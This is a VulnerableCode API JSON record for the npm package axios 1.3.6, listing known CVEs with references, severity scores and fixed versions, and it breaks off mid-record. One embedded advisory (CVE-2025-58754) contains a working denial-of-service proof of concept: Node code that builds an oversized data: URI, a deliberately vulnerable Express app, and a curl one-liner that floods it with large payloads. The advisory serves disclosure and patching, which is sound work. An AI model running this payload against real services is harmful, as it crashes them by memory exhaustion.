{"url":"http://public2.vulnerablecode.io/api/packages/631928?format=json","purl":"pkg:npm/axios@1.3.6","type":"npm","namespace":"","name":"axios","version":"1.3.6","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"1.13.5","latest_non_vulnerable_version":"1.15.0","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19716?format=json","vulnerability_id":"VCID-7rdk-mw2k-eqdx","summary":"Axios Cross-Site Request Forgery Vulnerability\nAn issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-45857.json","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-45857.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-45857","reference_id":"","reference_type":"","scores":[{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32738","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32711","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32775","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32773","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32747","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32699","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32878","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32842","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32727","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32751","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33193","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.3303","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33047","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00147","scoring_system":"epss","scoring_elements":"0.34739","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00161","scoring_system":"epss","scoring_elements":"0.3645","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-45857"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45857","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45857"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/2755df562b9c194fba6d8b609a383443f6a6e967","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/2755df562b9c194fba6d8b609a383443f6a6e967"},{"reference_url":"https://github.com/axios/axios/commit/96ee232bd3ee4de2e657333d4d2191cd389e14d0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/96ee232bd3ee4de2e657333d4d2191cd389e14d0"},{"reference_url":"https://github.com/axios/axios/issues/6006","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-04T15:13:57Z/"}],"url":"https://github.com/axios/axios/issues/6006"},{"reference_url":"https://github.com/axios/axios/issues/6022","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/issues/6022"},{"reference_url":"https://github.com/axios/axios/pull/6028","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/6028"},{"reference_url":"https://github.com/axios/axios/pull/6091","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/6091"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.28.0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/releases/tag/v0.28.0"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.6.0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/releases/tag/v1.6.0"},{"reference_url":"https://security.netapp.com/advisory/ntap-20240621-0006","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"reference_url":"https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1056099","reference_id":"1056099","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1056099"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2248979","reference_id":"2248979","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2248979"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-45857","reference_id":"CVE-2023-45857","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-45857"},{"reference_url":"https://github.com/advisories/GHSA-wf5p-g6vw-rhxx","reference_id":"GHSA-wf5p-g6vw-rhxx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wf5p-g6vw-rhxx"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1925","reference_id":"RHSA-2024:1925","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1925"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3314","reference_id":"RHSA-2024:3314","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3314"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3316","reference_id":"RHSA-2024:3316","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3316"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3473","reference_id":"RHSA-2024:3473","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3473"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3920","reference_id":"RHSA-2024:3920","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3920"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4269","reference_id":"RHSA-2024:4269","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:4269"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4455","reference_id":"RHSA-2024:4455","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:4455"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:5314","reference_id":"RHSA-2024:5314","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:5314"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:2876","reference_id":"RHSA-2025:2876","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:2876"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60987?format=json","purl":"pkg:npm/axios@1.6.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-epu9-wdt3-kbay"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.6.0"}],"aliases":["CVE-2023-45857","GHSA-wf5p-g6vw-rhxx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7rdk-mw2k-eqdx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/25655?format=json","vulnerability_id":"VCID-aq84-8cnz-byax","summary":"Axios is vulnerable to DoS attack through lack of data size check\n## Summary\n\nWhen Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.\nThis path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.\n\n## Details\n\nThe Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob.\n\nRelevant code from [`[httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):\n\n```js\nconst fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);\nconst parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);\nconst protocol = parsed.protocol || supportedProtocols[0];\n\nif (protocol === 'data:') {\n  let convertedData;\n  if (method !== 'GET') {\n    return settle(resolve, reject, { status: 405, ... });\n  }\n  convertedData = fromDataURI(config.url, responseType === 'blob', {\n    Blob: config.env && config.env.Blob\n  });\n  return settle(resolve, reject, { data: convertedData, status: 200, ... });\n}\n```\n\nThe decoder is in [`[lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):\n\n```js\nexport default function fromDataURI(uri, asBlob, options) {\n  ...\n  if (protocol === 'data') {\n    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;\n    const match = DATA_URL_PATTERN.exec(uri);\n    ...\n    const body = match[3];\n    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');\n    if (asBlob) { return new _Blob([buffer], {type: mime}); }\n    return buffer;\n  }\n  throw new AxiosError('Unsupported protocol ' + protocol, ...);\n}\n```\n\n* The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.\n* It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams.\n* As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.\n\nIn comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [`[maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.\n\n\n## PoC\n\n```js\nconst axios = require('axios');\n\nasync function main() {\n  // this example decodes ~120 MB\n  const base64Size = 160_000_000; // 120 MB after decoding\n  const base64 = 'A'.repeat(base64Size);\n  const uri = 'data:application/octet-stream;base64,' + base64;\n\n  console.log('Generating URI with base64 length:', base64.length);\n  const response = await axios.get(uri, {\n    responseType: 'arraybuffer'\n  });\n\n  console.log('Received bytes:', response.data.length);\n}\n\nmain().catch(err => {\n  console.error('Error:', err.message);\n});\n```\n\nRun with limited heap to force a crash:\n\n```bash\nnode --max-old-space-size=100 poc.js\n```\n\nSince Node heap is capped at 100 MB, the process terminates with an out-of-memory error:\n\n```\n<--- Last few GCs --->\n…\nFATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory\n1: 0x… node::Abort() …\n…\n```\n\nMini Real App PoC:\nA small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore `maxContentLength `, `maxBodyLength` and decodes into memory on Node before streaming enabling DoS.\n\n```js\nimport express from \"express\";\nimport morgan from \"morgan\";\nimport axios from \"axios\";\nimport http from \"node:http\";\nimport https from \"node:https\";\nimport { PassThrough } from \"node:stream\";\n\nconst keepAlive = true;\nconst httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });\nconst httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });\nconst axiosClient = axios.create({\n  timeout: 10000,\n  maxRedirects: 5,\n  httpAgent, httpsAgent,\n  headers: { \"User-Agent\": \"axios-poc-link-preview/0.1 (+node)\" },\n  validateStatus: c => c >= 200 && c < 400\n});\n\nconst app = express();\nconst PORT = Number(process.env.PORT || 8081);\nconst BODY_LIMIT = process.env.MAX_CLIENT_BODY || \"50mb\";\n\napp.use(express.json({ limit: BODY_LIMIT }));\napp.use(morgan(\"combined\"));\n\napp.get(\"/healthz\", (req,res)=>res.send(\"ok\"));\n\n/**\n * POST /preview { \"url\": \"<http|https|data URL>\" }\n * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).\n */\n\napp.post(\"/preview\", async (req, res) => {\n  const url = req.body?.url;\n  if (!url) return res.status(400).json({ error: \"missing url\" });\n\n  let u;\n  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: \"invalid url\" }); }\n\n  // Developer allows using data:// in the allowlist\n  const allowed = new Set([\"http:\", \"https:\", \"data:\"]);\n  if (!allowed.has(u.protocol)) return res.status(400).json({ error: \"unsupported scheme\" });\n\n  const controller = new AbortController();\n  const onClose = () => controller.abort();\n  res.on(\"close\", onClose);\n\n  const before = process.memoryUsage().heapUsed;\n\n  try {\n    const r = await axiosClient.get(u.toString(), {\n      responseType: \"stream\",\n      maxContentLength: 8 * 1024, // Axios will ignore this for data:\n      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:\n      signal: controller.signal\n    });\n\n    // stream only the first 64KB back\n    const cap = 64 * 1024;\n    let sent = 0;\n    const limiter = new PassThrough();\n    r.data.on(\"data\", (chunk) => {\n      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }\n      else { sent += chunk.length; limiter.write(chunk); }\n    });\n    r.data.on(\"end\", () => limiter.end());\n    r.data.on(\"error\", (e) => limiter.destroy(e));\n\n    const after = process.memoryUsage().heapUsed;\n    res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n    limiter.pipe(res);\n  } catch (err) {\n    const after = process.memoryUsage().heapUsed;\n    res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n    res.status(502).json({ error: String(err?.message || err) });\n  } finally {\n    res.off(\"close\", onClose);\n  }\n});\n\napp.listen(PORT, () => {\n  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);\n  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);\n});\n```\nRun this app and send 3 post requests:\n```sh\nSIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString(\"base64\"); process.stdout.write(JSON.stringify({url:\"data:application/octet-stream;base64,\"+b}))' \\\n| tee payload.json >/dev/null\nseq 1 3 | xargs -P3 -I{} curl -sS -X POST \"$URL\" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```\n```\n\n---\n\n## Suggestions\n\n1. **Enforce size limits**\n   For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit.\n\n2. **Stream decoding**\n   Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-58754","reference_id":"","reference_type":"","scores":[{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29896","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29756","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29944","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34373","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34392","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34629","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34669","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34158","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34289","published_at":"2026-04-29T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35614","published_at":"2026-04-13T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35637","published_at":"2026-04-12T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.3568","published_at":"2026-04-11T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35671","published_at":"2026-04-09T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35648","published_at":"2026-04-08T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35654","published_at":"2026-04-16T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-58754"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593"},{"reference_url":"https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67"},{"reference_url":"https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06"},{"reference_url":"https://github.com/axios/axios/pull/7011","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/pull/7011"},{"reference_url":"https://github.com/axios/axios/pull/7034","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/pull/7034"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.30.2","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/releases/tag/v0.30.2"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.12.0","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.12.0"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-58754","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-58754"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963","reference_id":"1114963","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2394735","reference_id":"2394735","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2394735"},{"reference_url":"https://github.com/advisories/GHSA-4hjh-wcwx-xvwj","reference_id":"GHSA-4hjh-wcwx-xvwj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4hjh-wcwx-xvwj"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:16747","reference_id":"RHSA-2025:16747","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:16747"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:18252","reference_id":"RHSA-2025:18252","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:18252"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19221","reference_id":"RHSA-2025:19221","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19221"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19375","reference_id":"RHSA-2025:19375","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19375"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19529","reference_id":"RHSA-2025:19529","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19529"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19804","reference_id":"RHSA-2025:19804","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19804"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:22759","reference_id":"RHSA-2025:22759","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:22759"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:23069","reference_id":"RHSA-2025:23069","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:23069"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:23131","reference_id":"RHSA-2025:23131","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:23131"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:23546","reference_id":"RHSA-2025:23546","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:23546"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:1018","reference_id":"RHSA-2026:1018","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:1018"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:1942","reference_id":"RHSA-2026:1942","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:1942"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:4215","reference_id":"RHSA-2026:4215","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:4215"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6226","reference_id":"RHSA-2026:6226","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6226"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/68901?format=json","purl":"pkg:npm/axios@1.12.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.12.0"}],"aliases":["CVE-2